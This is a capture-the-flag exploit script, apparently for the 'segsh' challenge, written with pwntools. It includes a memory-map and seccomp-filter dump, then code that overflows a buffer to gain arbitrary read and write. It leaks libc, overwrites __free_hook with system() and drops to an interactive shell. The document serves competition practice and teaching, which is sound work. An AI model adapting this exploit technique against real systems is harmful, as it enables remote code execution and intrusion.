Tags: python pwn
Rating:
#thread mem:
# 00000-02000:---:ldt2:
#1. 00000-02000:RWX:Text:CC
# 02000-14000:---:ldt0:ds,es,fs
#2. 12000-14000:RW-:Data
# 14000-1C000:RWX:????
# 1C000-2C000:RWX:ldt1:ss
#3. 24000-2C000:RW-:Stack
# ecx translation
# 00000-08000:Code, disallowed
# 08000-10000:Stack + ecx - 8000
# 10000- :Data + ecx - 10000
# [0] ld [0] ; jt = 0; jf = 0; k = 0;
# [1] je #3, l2, l3 ; jt = 0; jf = 1; k = 3;
# [2] ret SECCOMP_RET_ALLOW ; jt = 0; jf = 0; k = 0x7FF00000;
# [3] je #4, l4, l5 ; jt = 0; jf = 1; k = 4;
# [4] ret SECCOMP_RET_ALLOW ; jt = 0; jf = 0; k = 0x7FF00000;
# [5] je #1, l6, l7 ; jt = 0; jf = 1; k = 1;
# [6] ret SECCOMP_RET_ALLOW ; jt = 0; jf = 0; k = 0x7FFF0000;
# [7] ret SECCOMP_RET_KILL ; jt = 0; jf = 0; k = 0
from pwn import *
#s = process(['./segsh', '99999'])
s = remote('segsh.bostonkey.party', 8888)
s.recvuntil('__')
s.sendline('install -i echo')
s.recvuntil('__')
s.sendline('exec -e echo')
s.recvuntil('string: ')
exit = 0x10
syscall = 0x15
g1 = 0x69 # pop eax; pop ebx; pop edx; pop ecx; leave; ret;
pread = 0x6f
pwrite = 0x4d
leave = 0x4b
#gdb.attach(s)
def read(offset, size=0x1000):
p = '\xcc' * (1016)
p += p32(0xa000) # ebp
p += p32(pwrite)
p += p32(0)
p += p32(offset, sign='signed') # data
p += p32(size) # len
p += 'POOP'
s.send(p)
s.recvuntil('POOP')
data = s.recvn(size)
#print repr(s.recvuntil('string: '))
return data
def write(offset, data):
p = '\xcc' * (1016)
p += p32(0xa000) # ebp
p += p32(pread)
p += p32(0) # ret
p += p32(offset, sign='signed') # data
p += p32(len(data)) # len
p += 'CACA'
s.send(p)
sleep(0.1)
s.send(data)
s.recvuntil('CACA')
# Found those adress through previous memory scanning
base = 0x1f6000
libc_base = 0x1b000
libc_free = u32(read(base+0x4F94, 0x4))
libc = libc_free - 0x76C60
print(hex(libc))
# Rewrite package description to "/bin/sh"
write(base+0x5018, p32(libc + 0x160A24))
# Rewrit __free_hook to system()
write(libc_base + 0x1AB8D8, p32(libc + 0x40190))
s.sendline('cya')
s.recvuntil('__')
s.sendline('install -i hello')
s.recvuntil('__')
s.sendline('uninstall -u hello')
sleep(0.5)
s.interactive()
